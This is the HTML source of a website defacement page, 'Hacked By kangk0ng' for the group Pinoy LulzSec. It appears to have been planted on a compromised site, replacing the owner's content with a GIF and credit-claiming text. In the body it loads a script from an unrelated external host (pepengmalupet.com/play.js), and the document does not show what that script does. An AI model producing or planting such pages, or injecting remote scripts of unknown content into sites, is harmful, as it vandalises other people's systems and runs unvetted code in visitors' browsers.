
<html>
<head>
	<title>Hacked By kangk0ng</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <meta name="Author" content="kangk0ng"/>
        <meta name="copyright" content="kangk0ng">
        <meta name="description" content="Penetrat3d by Kangk0ng">
        <meta property="og:image" content="https://i.imgur.com/poYXFax.png">
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <meta name="Keywords" content="kangk0ng, hacked by kangk0ng, hacked, hacker, hacking,ricardo, milos, ricardo milos, lulzsec, pinoy, pinoylulzsec, pinoy lulzsec">	
<style>
	@import url('https://fonts.googleapis.com/css?family=Changa');
	*{
		box-sizing: border-box
	}
	html,body{
		background-color: #fff;
		font-family: Changa;
	}
	h1{
		font-size: 2.5vw;
		margin: 0;
 	}
 	.kangk0ng{
 		margin-top: 100px;
  		border: 4px solid black;
  		border-radius: 50px;
  	}
</style>
</head>
<body>
	<center>
	<img class="kangk0ng" src="https://i.giphy.com/media/fVVYV2SPnwYNH9OOZ5/giphy.webp" width="550"><br>
	<font color="gold" size="6">Hacked By kangk0ng</font><br>
	<font size="8" color="black">Pinoy LulzSec</font>
	<script type="text/javascript" src="https://pepengmalupet.com/play.js"></script>
  </center>
</body>
</html>